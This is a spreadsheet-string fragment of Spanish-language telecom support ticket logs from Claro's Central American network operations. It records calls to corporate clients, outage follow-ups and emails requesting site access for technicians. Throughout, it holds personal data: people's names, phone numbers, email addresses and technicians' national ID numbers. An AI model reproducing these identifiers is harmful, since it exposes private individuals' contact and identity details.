-ID 1001938671</t>
  </si>
  <si>
    <t>F4561037</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ULISES CACERES 94523521/22369615 NO RESPONDE AMBOS NUMEROS ENVIAN A  BUZON, SE INTENTARA LUEGO **
ID 1001932299 - 1001932429
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ULISES CACERES AL 94523521 CONFIRMA SERVICIO ESTABLE Y OPERATIVO**
ID 1001944205
**</t>
  </si>
  <si>
    <t>F4561038</t>
  </si>
  <si>
    <t>##SE MANDA CORREO AL CLIENTE PARA GESTIONAR PERMISOS ##
DE: VELDIN JANITZIO PALENCIA FLORES
ENVIADO: JUEVES, 12 DE MAYO DE 2022 11:58
PARA: LISANDRO.QUESADA@HN.ASESOREXTERNOCA.COM &lt;LISANDRO.QUESADA@HN.ASESOREXTERNOCA.COM&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; NIVEL 2 VIP &lt;NIVEL2.VIP@CLARO.COM.HN&gt;
ASUNTO: GESTIÓN DE PERMISOS | 929330OH | OH1000654608/SERVICIOS FINANCIEROS ELECTRICOS S A - | DESPENSA FAMILIAR, CHAMELECON, CORTES
BUENAS TARDES ESTIMADOS,
EN SEGUIMIENTO AL SERVICIO 929330OH | OH1000654608/SERVICIOS FINANCIEROS ELECTRICOS S A -  | DESPENSA FAMILIAR, CHAMELECON, CORTES
SOLICITAMOS DE SU APOYO GESTIONANDO ACCESOS PARA EL PERSONAL TÉCNICO. INDICANDO EL DÍA Y HORA DE VISITA.
TECNICOS:
PERSONAL DE GEORED:
DAVID AGUILAR AMADOR
ID 0801-1991-17499
CEL:  3237-5778
JUAN CARLOS AGUILAR
ID 0801-1988-16853
CEL: 3190-7613
QUEDAMOS ATENTOS A SUS COMENTARIOS,
SALUDOS CORDIALES</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SRTA. LISANDRO QUESADA 504) 2236-0100 EXT. 3 NO CONTESTO IVR ENVIA A BUZON, ID: 1001940846.</t>
  </si>
  <si>
    <t>F4561039</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE RENATO LORENZANA AL 23049696 CLIENTE CONFIRMA SERVICIO OK AUTORIZA CIERRE DE TICKET**
ID 2001160716
**</t>
  </si>
  <si>
    <t>F4561042</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JULIO PEREZ 36571015 MENCIONA QUE LOS EQUIPOS NO ESTABAN CONECTADOS A LA CORRIENTE ELECTRICA, SE NOTIFICARA PARA EL SEGUIMIENTO
-ID 1001996113</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JULIO PEREZ 36571015 MENCIONA QUE SE CONTACTO CON PR PERO INDICAN QUE TODO ESTA BIEN, SE VALIDA QUE EL SERVICIO CONTINUA CAIDO, CLIENTE INDICA QUE SE MOVILIZARA A PR POR LO QUE SOLICIT LLAMADA EN 45 MIN APROX
-ID 1001975383</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JULIO PEREZ 36571015 MENCIONA QUE ESTARA VALIDANDO CON PR, SE LLAMARA EN 15 MIN
-ID 1001968066</t>
  </si>
  <si>
    <t>F4561049</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MELVIN FAIL 54891453 MENCIONA QUE NO CUENTAN CON ENERGIA ELECTRICA EN PR
-ID 1001936865</t>
  </si>
  <si>
    <t>F4561064</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE KEILY CALDERON 35736014 SE DEJA EN CONFERENCIA CON GESTOR
-ID 1001970491</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE EMERSON  AGUILAR 47606282 MENCIONA QUE NO SE ENCUENTRA EN PR POR LO QUE BRINDA CONTACTO DE PR KEILY CALDERON 35736014
-ID 1001969488</t>
  </si>
  <si>
    <t>F4561067</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE PR 79276916 - 57340430  MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE Y CORTA LA LLAMADA, SE NOTIFICARA PARA EL SEGUIMIENTO
-ID 1001972612 - 1001973227</t>
  </si>
  <si>
    <t>F4561075</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ANTONI VELASQUEZ 50170599 INDICA QUE YA ESTA EN SITIO || SE NOTIFICA A GESTOR **
ID 1001991794
**</t>
  </si>
  <si>
    <t>F4561079</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CRISTIAN LOPEZ  AL 41856203NO RESPONDE, ENVIA A BUZON SE INTENTARA LUEGO **ID 1001945585
**</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE CRISTIAN LOPEZ 41856203 PARA VALIDAR EL SERVICIO
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4561083</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE YANINA FIGUEROA-56958216 CONFIRMA SERVICIO ESTABLE Y OPERATIVO**
ID 2001153130
**</t>
  </si>
  <si>
    <t>F4561084</t>
  </si>
  <si>
    <t>SE RECIBE CORREO DE CLIENTE SOLICITANDO DICTAMEN
DE: JULIAN SALAZAR (VENDOR) &lt;JULIAN.SALAZAR@WALMART.COM&gt;
ENVIADO: VIERNES, 13 DE MAYO DE 2022 8:26
PARA: CORPOWALMART &lt;CORPOWALMART@CLARO.COM.GT&gt;; NOE PEREZ &lt;NOE.PEREZ1@WALMART.COM&gt;; DICTAMENESCC &lt;DICTAMENESCC@CLARO.COM.GT&gt;
CC: CAM - CENTRO DE CONTROL DE INFRAESTRUCTURA &lt;CAM-CCINFR@WAL-MART.COM&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: RE: ENLACE CAÍDO DE MAXI DESPENSA CHIQUIMULA ID: 11500293
BUENOS DÍAS,
FAVOR DE BRINDARNOS EL DICTAMEN DEL CASO.
SALUDOS</t>
  </si>
  <si>
    <t xml:space="preserve">
SE CONVERSA CON CLIENTE NOE PEREZ, CONFIRMA SERVICIO OPERATIVO, SOLICITA MONITOREO HASTA LAS 18:00 HORAS DE HOY.
1001958389
COLA:
NOMBRE: A: 22437253
NÚMERO: 22437253
DURACIÓN: 0:01:15
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 22437253
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 12/05/2022 10:13:32</t>
  </si>
  <si>
    <t>SE CONVERSA CON CLIENTE  NO PEREZ Y SE VALIDA QUE HAY PROYECTO 5219298, EN CONSTRUCCION PARA LA TIENDA, POR LO QUE SE CONTACTARA A JEFE ASIGNADO  HECTOR EDUARDO FLORES SILVA PARA PARA DESCARTAR SI LA AFECTACION ES PARTE DEL PROYECTO EN MENCION.
NÚMERO: 22437253
INICIO: HOY, 09:32
ID DE LLAMADA: 1001943559</t>
  </si>
  <si>
    <t>SE CONFIRMA CON ANTONIO RODRIGUEZ QUE EN ESTE MOMENTO SE ESTA TRABAJANDO CON TECNICO EN SITIO CRISTIAN ARCHILA AL 32748403 Y DYLAN CUBON, SE PROCEDE A CONTACTAR AL TECNICO EN SITIO.
1001951495
COLA:
NOMBRE: A: 58264764
NÚMERO: 58264764
DURACIÓN: 0:07:18
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 58264764
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 12/05/2022 10:02:41</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A DICTAMENES, SE QUEDA A ESPERA DE RESPUESTA.
DE: LUVY ESAU SANDOVAL MATEO &lt;LUVY.SANDOVAL@CLARO.COM.GT&gt;
ENVIADO: VIERNES, 13 DE MAYO DE 2022 9:42
PARA: JULIAN SALAZAR (VENDOR) &lt;JULIAN.SALAZAR@WALMART.COM&gt;; CORPOWALMART &lt;CORPOWALMART@CLARO.COM.GT&gt;; NOE PEREZ &lt;NOE.PEREZ1@WALMART.COM&gt;; DICTAMENESCC &lt;DICTAMENESCC@CLARO.COM.GT&gt;
CC: CAM - CENTRO DE CONTROL DE INFRAESTRUCTURA &lt;CAM-CCINFR@WAL-MART.COM&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: RE: ENLACE CAÍDO DE MAXI DESPENSA CHIQUIMULA ID: 11500293 | SD1125026
BUENOS DÍAS,
FAVOR SU APOYO BRINDANDO DICTAMEN DEL INCIDENTE SD1125026 - TICKET F4561084 AL CLIENTE.
SALUDOS</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE Y RESPONDE JULIAN, MENCIONA QUE EL SERVICIO ESTA OPERATIVO PERO ESTARA ENVIANDO SOLICITUD DE DICTAMEN VIA CORREO Y AUTORIZA CIERRE DE CASO.
2001141398
COLA:
NOMBRE: A: 22437253
NÚMERO: 22437253
DURACIÓN: 0:04:45
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 22437253
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 13/05/2022 08:25:50</t>
  </si>
  <si>
    <t>F4561086</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CL
FALLA ENLACE GRANJERO 127</t>
  </si>
  <si>
    <t>F4561090</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ANIBAL MORALES 59394981 MENCIONA QUE NO LLEGAN AL ANCHO DE BANDA CONTRATADO, SE DEJA EN CONFERENCIA CON GESTOR
-ID 1001981012</t>
  </si>
  <si>
    <t>F4561104</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ASHLY FLORES 58130149 QUIEN CONFIRMA EL FUNCIONAMIENTO
-ID 1001983579</t>
  </si>
  <si>
    <t>F4561107</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ANDERSON OKELY 36493515 MENCIONA QUE  TIENE PERDIDA DE PAQUETES, SE LE MENCIONA QUE SE ESTA PRESENTANDO SATURACION, SE DEJA EN CONFERENCIA CON GESTOR
-ID 1001945655</t>
  </si>
  <si>
    <t>F4561124</t>
  </si>
  <si>
    <t>**SE PROCEDE A SOLICITAR DICTAMEN**
DE: VERONICA RAQUEL VASQUEZ CORTEZ &lt;VERONICAR.VASQUEZ@CLARO.COM.GT&gt;
ENVIADO: VIERNES, 13 DE MAYO DE 2022 9:46
PARA: DICTAMENES &lt;DICTAMENES@CLARO.COM.GT&gt;
CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; FRANCISCO EDUARDO QUEZADA GARCIA &lt;FRANCISCOED.QUEZADA@CLARO.COM.GT&gt;
ASUNTO: SOLICITUD DE RFO || IP2170017SV || OPERADORA DEL SUR S.A. DE C.V. ||</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE CON RFO
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: MARTES, 31 DE MAYO DE 2022 9:19
PARA: ERICK ORELLANA (VENDOR) &lt;ERICK.ORELLANA0@WALMART.COM&gt;
CC: CORPOWALMART &lt;CORPOWALMART@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; FRANCISCO EDUARDO QUEZADA GARCIA &lt;FRANCISCOED.QUEZADA@CLARO.COM.GT&gt;
ASUNTO: DICTAMEN TÉCNICO || SD1124950 || OPERADORA DEL SUR S.A.
BUEN DÍA
       EN SEGUIMIENTO AL TICKET SD1124950 SE REALIZA ENTREGA DE DICTAMEN TÉCNICO.
CUALQUIER CONSULTA, A LA ORDEN.
*-*-*-*-*</t>
  </si>
  <si>
    <t>**SE PROCEDE NUEVAMENTE A SOLICITAR DICTAMEN YA QUE AUN NO HAY RESPUESTA **
DE: VERONICA RAQUEL VASQUEZ CORTEZ &lt;VERONICAR.VASQUEZ@CLARO.COM.GT&gt;
ENVIADO: JUEVES, 26 DE MAYO DE 2022 8:32
PARA: DICTAMENES &lt;DICTAMENES@CLARO.COM.GT&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; FRANCISCO EDUARDO QUEZADA GARCIA &lt;FRANCISCOED.QUEZADA@CLARO.COM.GT&gt;
ASUNTO: RV: SOLICITUD DE RFO || IP2170017SV || OPERADORA DEL SUR S.A. DE C.V. ||</t>
  </si>
  <si>
    <t>NO COPIARON A PERSONAL DE DICTAMENESCC EN LA SOLICITUD DEL RFO QUE SE INDICA EN CRONO ANTERIOR; SE PIDE APOYO A CNOC CLARO A QUE NOS INCLUYAN EN LA COLA DE CORREOS VÍA SKYPE, EN ESPERA DE LAS 48/ HORAS HÁBILES PARA TENER EL RFO.</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 502-2243-7253 CONTESTA EL SEÑOR NOE CONFIRMA SERVICIO ESTABLE AUTORIZA CIERRE DE TICKET Y QUE SE LE COMPARTA EL DICTAMEN **
ID 2001162948
**</t>
  </si>
  <si>
    <t>F4561125</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE ANABELLA PORTILLO 56958238 PARA REALIZAR PRUEBAS
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ANABELLA PORTILLO AL 56958238 INDICA QUE ESTA EN SU HORA DE ALMUERZO QUE SE LE LLAME AL SEÑOR VICTOR ROQUE A LA AGENCIA Y BRINDA NUMERO 77935650 **
ID 2001009643
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE SEÑOR VICTOR ROQUE AL  77935650 INDICA QUE REALIZO UNA LLAMADA DE PRUEBA YH SI ESTA ESTABLE Y OPERATIVO EL SERVICIO**
ID 2001010830
**</t>
  </si>
  <si>
    <t>DESPUES DEL REINICIO EQUIPO ASMI SIGUE EN EL MISMO ESTADO CON LAS ALARMAS, SE LE INDICA AL CLIENTE QUE SE ENVIARA PERSONAL TECNICO A REVISAR LA RED YA QUE POSIBLEMENTE HAYA UN DAÑO, CLIENTE QUEDA ENTERADO, SE LE EXPLICA LOS PERMISOS PARA LA CENTRAL Y SE LE DA UN TIEMPO ESTIMADO DE 1:30 HRS DE LA LLEGADA DEL TECNICO, CLIENTE ESTARA PENDIENTES
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>CLIENTE REINICIA EQUIPO ASMI A LA ESPERA QUE CARGUE EL EQUIPO
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>CLIENTE ENRIQUE NOS ATIENDE COMENTA QUE LA SRITA PORTILLO TUVO QUE SALIR PERO QUE EL NOS PUEDE APOYAR CON REALIZAR PRUEBAS
CLIENTE INDICA QUE REALIZARON PRUEBAS CON EL EQUIPO AETHRA Y EL EQUIPO ASMI NO LO REVISARON, CLIENTE UBICA EQUIPO ASMI EL CUAL TIENE LAS SIGUIENTES ALARMAS
PWR - VERDE
SYNC - ROJO
ALM - ROJO
CLIENTE APOYA CON EL REINICIO DE EQUIPO
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4561129</t>
  </si>
  <si>
    <t>SE ENVIA CORREO PARA LA GESTION DE LOS PERMISOS
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: JUEVES, 12 DE MAYO DE 2022 12:11
PARA: TANIA.MORALES@SEGURIDAD.GOB.SV &lt;TANIA.MORALES@SEGURIDAD.GOB.SV&gt;
CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CORPORATIVOS, CLIENTES &lt;CLIENTESCORPORATIVOS@CLARO.COM.SV&gt;; AXEL SAMUEL LOPEZ ORTIZ &lt;AXELS.LOPEZ@CLARO.COM.GT&gt;
ASUNTO: SOLICITUD DE PERMISOS || DIRECCION GENERAL DE CENTROS PENALES || MP160532001SSV || F4561129
BUEN DÍA
EN SEGUIMIENTO AL TICKET SD1125046, SOLICITAMOS PUEDA GESTIONARSE EL ACCESO A PERSONAL TÉCNICO DE CLARO PARA EL INGRESO A SUS INSTALACIONES PARA REALIZAR LAS REPARACIONES NECESARIAS.
03236741-2      JOSE LUIS RODRIGUEZ
00815933-2      MANUEL GARCIA
04339969-2      HECTOR IVAN URQUILLA VASQUEZ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61145</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE DARLIN DE LEON AL 41282995 NO RESPONDE, ENVIA A BUZON SE INTENTARA LUEGO  **
ID 2001174428
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE DARLIN DE LEON 41282995 MENCIONA QUE NO HA DADO NINGUN PROBLEMA POR LO QUE SOLICITA LLAMADA PARA LAS 17:00 HRS
-ID 2001060977</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  DARLIN DE LEON 41282995 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001097514</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE DARLIN DE LEON 41282995 MENCIONA QUE EL INCONVENIENTE LO PRESENTO AYER POR LA TARDE, SOLICITA LLAMADA PARA LAS 15 HRS
-ID 1001986652</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  FERNANDO GUDIEL - 59172285 CONFIRMA SERVICIO ESTABLE Y OPERATIVO**
-ID 2001218115
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  FERNANDO GUDIEL - 59172285 NO RESPONDE, ENVIA A BUZON SE INTENTARA LUEGO**
-ID 2001202024
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE DARLIN DE LEON AL 41282995 INDICA QUE NO ESTA EN OFICINA QUE SE LE LLAME A LAS 10:00 AM **
ID 2001146405
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  FERNANDO GUDIEL - 59172285 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001190583</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE DARLIN DE LEON 41282995 MENCIONA QUE NO SE ENCUENTRA EN PR POR LO QUE BRINDA CONTACTO DE PR   FERNANDO GUDIEL - 59172285
-ID 2001190141</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE DARLIN DE LEON AL 41282995  NO RESPONDE, ENVIA A BUZON SE INTENTARA LUEGO  **
ID 2001185808
**</t>
  </si>
  <si>
    <t>F4561147</t>
  </si>
  <si>
    <t>SE LLAMA A CLEINTE ROSA PORTILLO 58136086 MENCIONA QUE EL INCONVENIENTE ES CON EL WIFI, SE NOTIFICARA A GESTOR PARA EL SEGUIMIENTO
-ID 1001991494</t>
  </si>
  <si>
    <t>RE: GESTIÓN DE ACCESOS F4561147 | 17400419T | CREDOMATIC GUATEMALA, S.A | INTERNET_AVENIDA VICENTE COZA LOTE 27 BARRIO EL MITCHAL MORALES IZABAL
J
JONATHAN EDUARDO TEZEN MEJIA
VIE 13/05/2022 12:44
PARA:FRANCISCO ALEXANDER LUTIN MONTEROS &lt;FLUTIN@BACCREDOMATIC.GT&gt;
CC:GRUPO N1;CNOCCA
BUENAS TARDES ,
ES UN GUSTO  SALUDARLES,  SI ESTÁN DE ACUERDO SE  PUEDE PROGRAMAR EL DÍA DE MAÑANA A LAS 10:00 O EL DÍA LUNES A LAS 08:00HRS, QUEDO ATENTO  A SU INDICACIÓN EN EL HORARIO QUE MEJOR SE ACOMODE A SU OPERACIÓN Y PODER REALIZAR LA PROGRAMACIÓN TÉCNICA.
SALUDOS,
DE: FRANCISCO ALEXANDER LUTIN MONTEROS &lt;FLUTIN@BACCREDOMATIC.GT&gt;
ENVIADO: VIERNES, 13 DE MAYO DE 2022 10:36
PARA: JONATHAN EDUARDO TEZEN MEJIA &lt;JONATHAN.TEZENM@CLARO.COM.GT&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: GESTIÓN DE ACCESOS F4561147 | 17400419T | CREDOMATIC GUATEMALA, S.A | INTERNET_AVENIDA VICENTE COZA LOTE 27 BARRIO EL MITCHAL MORALES IZABAL
BUENOS DÍAS.
EN QUÉ FECHA Y HORA HARÍAN LA VISITA.
ATENTAMENTE.</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ROSA PORTILLO  AL 58136086 INDICA QUE AUN ESTAN CORDINANDO LOS ACCESOS PARA EL PERSONAL **
ID 2001192552
**</t>
  </si>
  <si>
    <t>SE GETIONANA ACCESOS
GESTIÓN DE ACCESOS F4561147 | 17400419T | CREDOMATIC GUATEMALA, S.A | INTERNET_AVENIDA VICENTE COZA LOTE 27 BARRIO EL MITCHAL MORALES IZABAL
J
JONATHAN EDUARDO TEZEN MEJIA
VIE 13/05/2022 10:34
PARA:FLUTIN@BACCREDOMATIC.GT
CC:GRUPO N1;CNOCCA
BUEN DÍA  ESTIMADO CLIENTE
   GUSTO DE SALUDARLE ,  EL PRESENTE ES PARA SOLICITAR SEA  BRINDADO ACCESOS A NUESTRA ÁREA TÉCNICA, PARA TRABAJAR FALLA :  F4561147 | 17400419T | CREDOMATIC  GUATEMALA, S.A | INTERNET_AVENIDA VICENTE COZA LOTE 27 BARRIO EL MITCHAL MORALES IZABAL
TRAMITAR PERMISOS PARA LOS TÉCNICOS :
ARAGON MONTERROSO EDWIN ENRIQUE | DPI 2061825031801
SALUDOS,</t>
  </si>
  <si>
    <t>F4561148</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CARLOS GODINEZ AL 40713166 CLIENTE INDICA QUE NO ESTA EN SITIO QUE LLAMARA PARA CONFIRMAR SI YA ESTA ESTABLE EL SERVICIO SOLICITA QUE SE LE LLAME EN 5 MIN**
ID 1001962653
**
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE SEÑOR ERICK AGUILAR AL 42446031 INDICA QUE NO CUENTA CON SERVICIO EN ESTE MOMENTO || SE CONTACTA A GESTOR Y SE DEJA EN LINEA CON CLIENTE **
ID 1001968754
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CARLOS GODINEZ AL 40713166 INDICA QUE SE COMUNICOC CON LA AGENCIA Y LE INDICAN QUE NO TIENEN INTERNET SOLICITA QUE SE LE LLAME AL SEÑOR ERICK AGUILAR AL 42446031 **
ID 1001968059
**
**</t>
  </si>
  <si>
    <t>F4561168</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JOSELIN VANESA 55140066 MENCIONA QUE ESTA PRESENTANDO INESTABILIDAD, GESTOR SE ENCUENTRA EN OTRA LLAMADA, SE NOTIFICARA PARA EL SEGUIMIENTO
-ID 1001998946</t>
  </si>
  <si>
    <t>F4561176</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE QUIEN INDICA SEGUIMIENTO HASTA EL DIA LUNES ESTARAN EVALUANDO Y REVISANDO A  NIVEL INTERNO.
&gt; SE ENVIA CORREO CON GRAFICAS Y LOG DE IP DUPLICADA PARA REVISION DE CLIENTE--
921300001T - CORPORACION MEDICO QUIRURGICA, S.A</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE QUIEN INDICA SEGUIMIENTO HASTA EL DIA LUNES ESTARAN EVALUANDO Y REVISANDO A  NIVEL INTERNO.
&gt;&gt; SE ENVIA CORREO CON GRAFICAS Y LOG DE IP DUPLICADA PARA REVISION DE CLIENTE--
921300001T - CORPORACION MEDICO QUIRURGICA, S.A</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ERICK MENDEZ 36621815 SE DEJA EN CONFERENCIA CON GESTOR
-ID 2001006024</t>
  </si>
  <si>
    <t>SE LE INDICA A CLIENTE INCONVENIENTE CON EQUIPOS INDICA QUE VALIDARA A NIVEL INTERNO Y ESTARA DEVOLVIENDO LLAMADA PARA VALIDAR SI ES POR ELLO QUE TIENEN CAIDAS ADICIONAL SE LE COMENTA DE ENVIO DE GRAFICAS COMO EVIDENCIAS QUE POR PARTE DE CLARO SERVICIO ESTA SIENDO ENTREGADO CORRECTAMENTE...</t>
  </si>
  <si>
    <t>SE LLAMA A ERIC QUIEN INDICA QUE SE DEVUELVA LA LLAMADA N 15 MINUTOS YA QUE SE ENCUENTRA OCUPADO.</t>
  </si>
  <si>
    <t>F4561177</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE JOSELINE HERRERA, QUIEN AUTORIZA EL CIERRE.
SE REVISO EN LA REPISA LRS Y NO SE OBSERVAN ERRORES EN EL MEDIO.
2001081979
COLA:
NOMBRE: A: 78870630
NÚMERO: 78870630
DURACIÓN: 0:00:25
ESTADO: CONECTADA
DETALLES: 78870630
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 12/05/2022 16:13:08</t>
  </si>
  <si>
    <t>SE LLAMA A A CLIETNE JOSELINE HERRERA 78870630 Y SE LE COMENTA QUE NUESTROS TECNICOS ESTARA LLEGANDO A LAS 14 HORAS ## VAN EN CAMINO ##CLCIENTE QUEDA ENTERADO + ESPERA CORREO PARA TRAMITAR PERMISOS ##VIVO</t>
  </si>
  <si>
    <t>SE HA ENVIADO CORREO A CLIENTE- EN ESPERA DE RESPUESTA ##VISITA COORDINADA PARA 14 HORAS ##
DE: MARIA ISABEL GODINEZ SAENZ
ENVIADO: JUEVES, 12 DE MAYO DE 2022 12:25
PARA: SPAYERAS@MICOOPE-DONANT &lt;SPAYERAS@MICOOPE-DONANT&gt;; JHERRERA@MICOOPE-DONANTEL.COM.GT &lt;JHERRERA@MICOOPE-DONANTEL.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; ISO.CNOC.ACCESOS &lt;ISOCNOCACCESOS@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; JOSE ANGEL GODINEZ OVALLE &lt;JANGEL.GODINEZ@CLARO.COM.GT&gt;
ASUNTO: GDN 79319595|| COOPERATIVA DE AHORRO Y CREDITO Y SERVICIOS VARIOS TONANTEL R.L. - 3 CALLE 4-02 ZONA 1 BARBERENA SANTA ROSA
BUEN DÍA ESTIMADA, CON RESPECTO AL E1:
GDN 79319595
COOPERATIVA DE AHORRO Y CREDITO Y SERVICIOS VARIOS TONANTEL R.L.
- 3 CALLE 4-02 ZONA 1 BARBERENA SANTA ROSA
SOLICITO SU APOYO PARA EL TRAMITE DE PERMISOS HACIA NUESTROS TÉCNICOS:
OSCAR OSWALDO PALALA MORENO  DPI 1834401530601
YANCARLOS PERNILLO CASTILLO       DPI 2353472562216
QUEDAMOS ATENTOS A SUS COMENTARIOS,
SALUDOS,
 ¯¿"*°¿¿°*"¿¯`¿¯¿"*°¿¿°*"¿¯`
¡TE CUIDAS TÚ, NOS CUIDAMOS TODOS! &amp;#xd83d;&amp;#xde37;</t>
  </si>
  <si>
    <t>F4561179</t>
  </si>
  <si>
    <t>SE CONVERSA CON EJECUTIVA RUTH MELARA, INDICA QUE QUE CLIENTE NO TIENE SERVICIO Y ES POR ESA RAZON QUE REQUIERE VISITA, ADICIONAL, INDICA QUE LA VISITA SE PROGRAME PARA EL DIA DE MAÑANA A PRIMERA HORA. AUNQUE  A NIVEL WAN SE OBSERVA OPERATIVO, NO SE TIENE GESTION VIA TELNET,  POR LO QUE NO SE PUEDE DETERMINAR ESTADO DE LAS INTERFACES LAN Y EJECUTIVA CONFIRMA QUE EL CPE ES PROPIEDAD DE CLARO, POR LO QUE SE COORDINARA VISITA PARA RECUPERAR GESTION Y VALIDAR SERVICIO CON CLIENTE.
NÚMERO: 0050376022711
INICIO: HOY, 15:49
ID DE LLAMADA: 2001075289</t>
  </si>
  <si>
    <t>SE CONVERSA CON EJECUTIVA RUTH MELARA, MENCIONA QUE LE DARA SEGUIMIENTO CON EL CLIENTE Y QUE SE PROCEDA AL CIERRE DE TICKET, DEBIDO A QUE PRESENTA REINICIO SE ASUME CORTE DE ENERGIA EN SITIO.
2001092825
COLA:
NOMBRE: A: 0050376022711
NÚMERO: 0050376022711
DURACIÓN: 0:03:39
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 0050376022711
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 12/05/2022 16:54:37</t>
  </si>
  <si>
    <t>SE CONVERSA CON CLIENTE LUIS PALACIOS, INDICA QUE EL NO HA REALIZADO NINGUN REPORTE, Y QUE NO SE TIENE INSTALACION DE SERVICIO POR PARTE DE CLARO AUN,  POR LO QUE SE DETENDRA VISITA TECNICA HASTA IDENTIFICAR LA DIRECCION DEL PUNTO REMOTO, CLIENTE MENCIONA QUE SE LE PUEDE LLAMAR MAÑANA A PARTIR DE LAS 8;00 HORAS.  Y SE CONTACTARA A EJECUTIVA NUEVAMENTE PARA OBTENER DIRECCION DEL SITIO REPORTADO.
NÚMERO: 0050379328616
INICIO: HOY, 16:34
ID DE LLAMADA: 2001088472</t>
  </si>
  <si>
    <t>F4561192</t>
  </si>
  <si>
